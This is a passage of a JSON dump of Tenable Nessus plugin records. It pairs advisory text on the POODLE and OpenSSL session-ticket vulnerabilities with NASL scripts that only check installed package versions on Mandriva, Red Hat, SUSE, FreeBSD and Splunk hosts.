thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"davmail<4.6.0\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-01-16T20:19:59", "references": ["https://www.openssl.org/news/secadv/20141015.txt"], "pluginID": "78665", "description": "Multiple vulnerabilities has been discovered and corrected in \nopenssl :\n\nOpenSSL has added support for TLS_FALLBACK_SCSV to allow applications\nto block the ability for a MITM attacker to force a protocol\ndowngrade. Some client applications (such as browsers) will reconnect\nusing a downgraded protocol to work around interoperability bugs in\nolder servers. This could be exploited by an active man-in-the-middle\nto downgrade connections to SSL 3.0 even if both sides of the\nconnection support higher protocols. SSL 3.0 contains a number of\nweaknesses including POODLE (CVE-2014-3566).\n\nWhen an OpenSSL SSL/TLS/DTLS server receives a session ticket the\nintegrity of that ticket is first verified. In the event of a session\nticket integrity check failing, OpenSSL will fail to free memory\ncausing a memory leak. By sending a large number of invalid session\ntickets an attacker could exploit this issue in a Denial Of Service\nattack (CVE-2014-3567).\n\nThe updated packages have been upgraded to the 1.0.0o version where\nthese security flaws has been fixed.", "edition": 7, "reporter": "Tenable", "published": "2014-10-24T00:00:00", "title": "Mandriva Linux Security Advisory : openssl (MDVSA-2014:203)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Mandriva Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566", "CVE-2014-3567"], "modified": "2019-01-02T00:00:00", "cpe": ["cpe:/o:mandriva:business_server:1", "p-cpe:/a:mandriva:linux:openssl", "p-cpe:/a:mandriva:linux:lib64openssl-engines1.0.0", "p-cpe:/a:mandriva:linux:lib64openssl1.0.0", "p-cpe:/a:mandriva:linux:lib64openssl-devel", "p-cpe:/a:mandriva:linux:lib64openssl-static-devel"], "id": "MANDRIVA_MDVSA-2014-203.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=78665", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:203. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78665);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/01/02 16:37:54\");\n\n script_cve_id(\"CVE-2014-3566\", \"CVE-2014-3567\");\n script_bugtraq_id(70574, 70586);\n script_xref(name:\"MDVSA\", value:\"2014:203\");\n\n script_name(english:\"Mandriva Linux Security Advisory : openssl (MDVSA-2014:203)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities has been discovered and corrected in \nopenssl :\n\nOpenSSL has added support for TLS_FALLBACK_SCSV to allow applications\nto block the ability for a MITM attacker to force a protocol\ndowngrade. Some client applications (such as browsers) will reconnect\nusing a downgraded protocol to work around interoperability bugs in\nolder servers. This could be exploited by an active man-in-the-middle\nto downgrade connections to SSL 3.0 even if both sides of the\nconnection support higher protocols. SSL 3.0 contains a number of\nweaknesses including POODLE (CVE-2014-3566).\n\nWhen an OpenSSL SSL/TLS/DTLS server receives a session ticket the\nintegrity of that ticket is first verified. In the event of a session\nticket integrity check failing, OpenSSL will fail to free memory\ncausing a memory leak. By sending a large number of invalid session\ntickets an attacker could exploit this issue in a Denial Of Service\nattack (CVE-2014-3567).\n\nThe updated packages have been upgraded to the 1.0.0o version where\nthese security flaws has been fixed.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.openssl.org/news/secadv/20141015.txt\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64openssl-engines1.0.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64openssl-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64openssl1.0.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64openssl-devel-1.0.0o-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64openssl-engines1.0.0-1.0.0o-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64openssl-static-devel-1.0.0o-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64openssl1.0.0-1.0.0o-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"openssl-1.0.0o-1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:20:22", "references": ["https://www.splunk.com/view/SP-CAAANST", "https://www.openssl.org/~bodo/ssl-poodle.pdf", "https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00", "https://www.imperialviolet.org/2014/10/14/poodle.html"], "pluginID": "79721", "description": "According to its version number, the Splunk Enterprise hosted on the\nremote web server is 5.0.x prior to 5.0.11. It is, therefore, affected\nby the following vulnerabilities :\n\n - A man-in-the-middle (MitM) information disclosure\n vulnerability, known as POODLE, exists due to the way\n SSL 3.0 handles padding bytes when decrypting messages\n encrypted using block ciphers in cipher block chaining\n (CBC) mode. A MitM attacker can decrypt a selected byte\n of a cipher text in as few as 256 tries if they are able\n to force a victim application to repeatedly send the\n same data over newly created SSL 3.0 connections.\n (CVE-2014-3566)\n\n - A flaw exists in the included OpenSSL library due to\n handling session tickets that have not been properly\n verified for integrity. A remote attacker, by using a\n large number of invalid session tickets, can exploit\n this to cause a denial of service. (CVE-2014-3567)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 7, "reporter": "Tenable", "published": "2014-12-04T00:00:00", "title": "Splunk Enterprise 5.0.x < 5.0.11 Multiple Vulnerabilities (POODLE)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Web Servers", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566", "CVE-2014-3567"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/a:splunk:splunk"], "id": "SPLUNK_5011.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=79721", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79721);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/11/15 20:50:25\");\n\n script_cve_id(\"CVE-2014-3566\", \"CVE-2014-3567\");\n script_bugtraq_id(\n 70574,\n 70586\n );\n script_xref(name:\"CERT\", value:\"577193\");\n\n script_name(english:\"Splunk Enterprise 5.0.x < 5.0.11 Multiple Vulnerabilities (POODLE)\");\n script_summary(english:\"Checks the version of Splunk Enterprise.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains an application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version number, the Splunk Enterprise hosted on the\nremote web server is 5.0.x prior to 5.0.11. It is, therefore, affected\nby the following vulnerabilities :\n\n - A man-in-the-middle (MitM) information disclosure\n vulnerability, known as POODLE, exists due to the way\n SSL 3.0 handles padding bytes when decrypting messages\n encrypted using block ciphers in cipher block chaining\n (CBC) mode. A MitM attacker can decrypt a selected byte\n of a cipher text in as few as 256 tries if they are able\n to force a victim application to repeatedly send the\n same data over newly created SSL 3.0 connections.\n (CVE-2014-3566)\n\n - A flaw exists in the included OpenSSL library due to\n handling session tickets that have not been properly\n verified for integrity. A remote attacker, by using a\n large number of invalid session tickets, can exploit\n this to cause a denial of service. (CVE-2014-3567)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.splunk.com/view/SP-CAAANST\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.imperialviolet.org/2014/10/14/poodle.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/~bodo/ssl-poodle.pdf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Splunk Enterprise 5.0.11 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n \n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:splunk:splunk\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"splunkd_detect.nasl\",\"splunk_web_detect.nasl\");\n script_require_ports(\"Services/www\", 8089, 8000);\n script_require_keys(\"installed_sw/Splunk\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"Splunk\";\n\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:8000, embedded:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ndir = install['path'];\nver = install['version'];\n\ninstall_url = build_url(qs:dir, port:port);\n\n# Affected : 5.0.x < 5.0.11\nif (ver =~ \"^5\\.0\\.\" && ver_compare(ver:ver,fix:\"5.0.11\",strict:FALSE) < 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' +install_url+\n '\\n Installed version : ' +ver+\n '\\n Fixed version : 5.0.11\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, ver);\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:19:55", "references": ["https://access.redhat.com/security/cve/cve-2014-3513", "https://access.redhat.com/errata/RHSA-2014:1652", "https://access.redhat.com/articles/1232123", "https://access.redhat.com/security/cve/cve-2014-3567"], "pluginID": "78532", "description": "Updated openssl packages that contain a backported patch to mitigate\nthe CVE-2014-3566 issue and fix two security issues are now available\nfor Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL),\nTransport Layer Security (TLS), and Datagram Transport Layer Security\n(DTLS) protocols, as well as a full-strength, general purpose\ncryptography library.\n\nThis update adds support for the TLS Fallback Signaling Cipher Suite\nValue (TLS_FALLBACK_SCSV), which can be used to prevent protocol\ndowngrade attacks against applications which re-connect using a lower\nSSL/TLS protocol version when the initial connection indicating the\nhighest supported protocol version fails.\n\nThis can prevent a forceful downgrade of the communication to SSL 3.0.\nThe SSL 3.0 protocol was found to be vulnerable to the padding oracle\nattack when using block cipher suites in cipher block chaining (CBC)\nmode. This issue is identified as CVE-2014-3566, and also known under\nthe alias POODLE. This SSL 3.0 protocol flaw will not be addressed in\na future update; it is recommended that users configure their\napplications to require at least TLS protocol version 1.0 for secure\ncommunication.\n\nFor additional information about this flaw, see the Knowledgebase\narticle at https://access.redhat.com/articles/1232123\n\nA memory leak flaw was found in the way OpenSSL parsed the DTLS Secure\nReal-time Transport Protocol (SRTP) extension data. A remote attacker\ncould send multiple specially crafted handshake messages to exhaust\nall available memory of an SSL/TLS or DTLS server. (CVE-2014-3513)\n\nA memory leak flaw was found in the way an OpenSSL handled failed\nsession ticket integrity checks. A remote attacker could exhaust all\navailable memory of an SSL/TLS or DTLS server by sending a large\nnumber of invalid session tickets to that server. (CVE-2014-3567)\n\nAll OpenSSL users are advised to upgrade to these updated packages,\nwhich contain backported patches to mitigate the CVE-2014-3566 issue\nand correct the CVE-2014-3513 and CVE-2014-3567 issues. For the update\nto take effect, all services linked to the OpenSSL library (such as\nhttpd and other SSL-enabled services) must be restarted or the system\nrebooted.", "edition": 11, "reporter": "Tenable", "published": "2014-10-17T00:00:00", "title": "RHEL 6 / 7 : openssl (RHSA-2014:1652) (POODLE)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566", "CVE-2014-3513", "CVE-2014-3567"], "modified": "2018-11-10T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:openssl-libs", "p-cpe:/a:redhat:enterprise_linux:openssl-static", "cpe:/o:redhat:enterprise_linux:7.4", "p-cpe:/a:redhat:enterprise_linux:openssl-debuginfo", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:6.6", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:openssl-perl", "cpe:/o:redhat:enterprise_linux:7.3", "p-cpe:/a:redhat:enterprise_linux:openssl", "cpe:/o:redhat:enterprise_linux:7.6", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:openssl-devel"], "id": "REDHAT-RHSA-2014-1652.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=78532", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:1652. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78532);\n script_version(\"1.26\");\n script_cvs_date(\"Date: 2018/11/10 11:49:53\");\n\n script_cve_id(\"CVE-2014-3513\", \"CVE-2014-3566\", \"CVE-2014-3567\");\n script_xref(name:\"RHSA\", value:\"2014:1652\");\n\n script_name(english:\"RHEL 6 / 7 : openssl (RHSA-2014:1652) (POODLE)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated openssl packages that contain a backported patch to mitigate\nthe CVE-2014-3566 issue and fix two security issues are now available\nfor Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL),\nTransport Layer Security (TLS), and Datagram Transport Layer Security\n(DTLS) protocols, as well as a full-strength, general purpose\ncryptography library.\n\nThis update adds support for the TLS Fallback Signaling Cipher Suite\nValue (TLS_FALLBACK_SCSV), which can be used to prevent protocol\ndowngrade attacks against applications which re-connect using a lower\nSSL/TLS protocol version when the initial connection indicating the\nhighest supported protocol version fails.\n\nThis can prevent a forceful downgrade of the communication to SSL 3.0.\nThe SSL 3.0 protocol was found to be vulnerable to the padding oracle\nattack when using block cipher suites in cipher block chaining (CBC)\nmode. This issue is identified as CVE-2014-3566, and also known under\nthe alias POODLE. This SSL 3.0 protocol flaw will not be addressed in\na future update; it is recommended that users configure their\napplications to require at least TLS protocol version 1.0 for secure\ncommunication.\n\nFor additional information about this flaw, see the Knowledgebase\narticle at https://access.redhat.com/articles/1232123\n\nA memory leak flaw was found in the way OpenSSL parsed the DTLS Secure\nReal-time Transport Protocol (SRTP) extension data. A remote attacker\ncould send multiple specially crafted handshake messages to exhaust\nall available memory of an SSL/TLS or DTLS server. (CVE-2014-3513)\n\nA memory leak flaw was found in the way an OpenSSL handled failed\nsession ticket integrity checks. A remote attacker could exhaust all\navailable memory of an SSL/TLS or DTLS server by sending a large\nnumber of invalid session tickets to that server. (CVE-2014-3567)\n\nAll OpenSSL users are advised to upgrade to these updated packages,\nwhich contain backported patches to mitigate the CVE-2014-3566 issue\nand correct the CVE-2014-3513 and CVE-2014-3567 issues. For the update\nto take effect, all services linked to the OpenSSL library (such as\nhttpd and other SSL-enabled services) must be restarted or the system\nrebooted.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/articles/1232123\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2014:1652\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-3513\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-3567\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/16\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:1652\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"openssl-1.0.1e-30.el6.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"openssl-debuginfo-1.0.1e-30.el6.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"openssl-devel-1.0.1e-30.el6.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openssl-perl-1.0.1e-30.el6.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openssl-perl-1.0.1e-30.el6.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openssl-perl-1.0.1e-30.el6.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openssl-static-1.0.1e-30.el6.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"openssl-static-1.0.1e-30.el6.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openssl-static-1.0.1e-30.el6.2\")) flag++;\n\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"openssl-1.0.1e-34.el7_0.6\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openssl-1.0.1e-34.el7_0.6\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"openssl-debuginfo-1.0.1e-34.el7_0.6\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"openssl-devel-1.0.1e-34.el7_0.6\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"openssl-libs-1.0.1e-34.el7_0.6\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"openssl-perl-1.0.1e-34.el7_0.6\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openssl-perl-1.0.1e-34.el7_0.6\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"openssl-static-1.0.1e-34.el7_0.6\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssl / openssl-debuginfo / openssl-devel / openssl-libs / etc\");\n }\n}\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:21:33", "references": ["https://bugzilla.suse.com/show_bug.cgi?id=901223", "https://www.suse.com/security/cve/CVE-2014-3566/", "https://www.suse.com/security/cve/CVE-2014-3568/", "http://www.nessus.org/u?c6de12a1", "https://www.suse.com/security/cve/CVE-2014-3567/", "http://www.nessus.org/u?1717e36a", "https://bugzilla.suse.com/show_bug.cgi?id=901277"], "pluginID": "83641", "description": "This OpenSSL update fixes the following issues :\n\n - Session Ticket Memory Leak (CVE-2014-3567)\n\n - Build option no-ssl3 is incomplete ((CVE-2014-3568)\n\n - Add support for TLS_FALLBACK_SCSV to mitigate\n CVE-2014-3566 (POODLE)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 10, "reporter": "Tenable", "published": "2015-05-20T00:00:00", "title": "SUSE SLES10 Security Update : OpenSSL (SUSE-SU-2014:1387-1) (POODLE)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566", "CVE-2014-3567", "CVE-2014-3568"], "modified": "2018-11-10T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:openssl-doc", "p-cpe:/a:novell:suse_linux:openssl-devel", "p-cpe:/a:novell:suse_linux:openssl", "cpe:/o:novell:suse_linux:10"], "id": "SUSE_SU-2014-1387-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=83641", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2014:1387-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83641);\n script_version(\"2.10\");\n script_cvs_date(\"Date: 2018/11/10 11:50:02\");\n\n script_cve_id(\"CVE-2014-3566\", 